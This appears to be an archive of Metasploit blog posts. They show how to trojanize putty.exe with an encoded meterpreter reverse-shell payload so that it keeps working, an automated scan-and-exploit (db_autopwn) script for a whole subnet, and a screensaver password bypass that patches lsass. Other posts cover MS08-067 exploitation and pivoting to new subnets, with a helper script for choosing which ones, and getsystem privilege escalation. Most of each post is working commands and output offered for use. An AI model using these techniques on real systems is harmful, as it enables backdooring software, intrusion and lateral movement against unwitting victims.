Archive for the ‘metasploit’ Category

msfencoded payloads into executables (-k)

For a while now it has been possible to add msfencoded payloads into executables. However, the resulting files would not work as expected, i.e. you could trick a user into running a file which would in turn give you a meterpreter session, but the user would soon find that something was amiss with the exe... not any more.

http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896

./msfencode -h

Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.199.129 LPORT=31337 R | ./msfencode -x putty.exe -t exe -k -o putty_backdoored.exe -e x86/shikata_ga_nai -c 10

[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 477 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 504 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 531 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 558 (iteration=10)

file putty_backdoored.exe
putty_backdoored.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.199.129
LHOST => 192.168.199.129
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.199.129:31337
[*] Starting the payload handler…
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.199.129:31337 -> 192.168.199.130:50766)

You’ll still need to migrate, or your shell will terminate when the backdoored process is killed.

msfconsole and db_autopwn

I just saw this on seclists.org.

HD Moore posted this to kick off db_autopwn via an msfconsole RC script:

$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r

$ msfconsole -r ownitall.rc

Passworded Screensaver Bypass

The Relentless-coding blog just released a script for meterpreter that will bypass password protection for screensavers in Windows XP (SP2 & SP3), Vista, and Windows 7. The script patches the lsass process (you’ll need system-level permissions) to circumvent the password check. Once applied, an attacker can enter anything as the password to unlock. PaulDotCom has a video on vimeo demonstrating it.

Automatically Route Through New Subnets with Metasploit

One of the coolest features of any exploitation framework is the ability to further penetrate the network via the exploited host. Here is how to pivot an attack in Metasploit:


msf exploit(ms09_002_memory_corruption) > sessions -l

Active sessions
===============

Id  Description  Tunnel
--  -----------  ------
1   Meterpreter  192.168.1.109:8080 -> 192.168.1.104:62239

msf exploit(ms09_002_memory_corruption) > ifconfig
[*] exec: ifconfig

eth0 Link encap:Ethernet HWaddr 00:0d:29:d9:ec:cc
inet addr:192.168.1.109 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fee8:ebe7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14826 errors:12824 dropped:0 overruns:0 frame:0
TX packets:6634 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:7542708 (7.5 MB) TX bytes:2385453 (2.3 MB)
Interrupt:19 Base address:0x2024

msf exploit(ms09_002_memory_corruption) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > route

Network routes
==============

Subnet           Netmask          Gateway
------           -------          -------
0.0.0.0          0.0.0.0          192.168.55.2
192.168.55.0     255.255.255.0    192.168.55.140
192.168.55.140   255.255.255.255  127.0.0.1
127.0.0.0        255.0.0.0        127.0.0.1
224.0.0.0        240.0.0.0        192.168.55.140
255.255.255.255  255.255.255.255  192.168.55.140

meterpreter >
Background session 1? [y/N]y

msf exploit(ms09_002_memory_corruption) > route add 192.168.55.0 255.255.255.0 1
msf exploit(ms09_002_memory_corruption) > route print

Active Routing Table
====================

Subnet        Netmask        Gateway
------        -------        -------
192.168.55.0  255.255.255.0  Session 1

msf exploit(ms09_002_memory_corruption) > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/patchupmeterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Exploit target:

Id  Name
--  ----
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.55.128
RHOST => 192.168.55.128
msf exploit(ms08_067_netapi) > set LPORT 9000
LPORT => 9000
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 2 - lang:English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (205835 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.1.109:9000 -> 192.168.1.104:62260)

meterpreter > execute -f cmd.exe -i
Process 3864 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32> ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 6:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.55.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.55.2

C:\WINDOWS\system32>exit

meterpreter >
Background session 2? [y/N]y

The problem is that it requires a lot of typing. HD Moore has created a plug-in that automatically adds a route for previously unseen subnets when a new session opens. Here is an example of its usage and output:


msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.128:2355)
[*] AutoAddRoute: Routing new subnet 192.168.1.0/255.255.255.0 through session 1

meterpreter > background
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

Subnet       Netmask        Gateway
------       -------        -------
192.168.1.0  255.255.255.0  Session 1

msf exploit(ms08_067_netapi) >

Awesome…..
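The subnet selection that the plugin has to make is worth spelling out. The Python below is an added example, not code from the original post or from Metasploit's plugin: it parses the meterpreter route table quoted above, discards routes with no pivot value (default, /32 host, loopback, multicast and limited broadcast), and reports the subnets the console host cannot already reach from its own interfaces. LOCAL_NETS is taken from the eth0 address in the ifconfig output above; the route text is a constructed copy of the table on this page.

```python
import ipaddress

# Constructed sample input: the meterpreter "route" table shown earlier on this page.
ROUTE_OUTPUT = """\
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.55.2
192.168.55.0 255.255.255.0 192.168.55.140
192.168.55.140 255.255.255.255 127.0.0.1
127.0.0.0 255.0.0.0 127.0.0.1
224.0.0.0 240.0.0.0 192.168.55.140
255.255.255.255 255.255.255.255 192.168.55.140
"""

# Networks the console host already sits on (eth0 in the ifconfig output above).
LOCAL_NETS = ["192.168.1.0/24"]


def parse_routes(text):
    """Return (subnet, netmask, gateway) IPv4Address triples from a route dump."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # blank or title lines
        try:
            rows.append(tuple(ipaddress.IPv4Address(p) for p in parts))
        except ipaddress.AddressValueError:
            continue  # the "Subnet Netmask Gateway" header and its dashes
    return rows


def new_pivot_subnets(route_text, local_nets):
    """Subnets visible from the session that the console host cannot reach itself."""
    local = [ipaddress.IPv4Network(n) for n in local_nets]
    found = []
    for subnet, mask, _gateway in parse_routes(route_text):
        net = ipaddress.IPv4Network((subnet, str(mask)), strict=False)
        # No pivot value: default route, /32 host routes, loopback, multicast,
        # and the limited-broadcast address (255.255.255.255 is "reserved").
        if net.prefixlen in (0, 32) or net.is_loopback or net.is_multicast or net.is_reserved:
            continue
        # Already reachable directly: no route through the session is needed.
        if any(net.overlaps(l) for l in local):
            continue
        found.append(str(net))
    return found
```

For the table above this yields only 192.168.55.0/24, which is exactly the one `route add` the manual walkthrough needed.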

meterpreter getsystem

meterpreter > use priv
Loading extension priv…success.

meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:

-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
…got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid
Server username: MILLIWAYS\marvin

meterpreter > getsystem -t 2
…got system (via technique 2).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid
Server username: MILLIWAYS\marvin

meterpreter > getsystem -t 3
…got system (via technique 3).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid
Server username: MILLIWAYS\marvin

meterpreter > getsystem -t 4
…got system (via technique 4).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
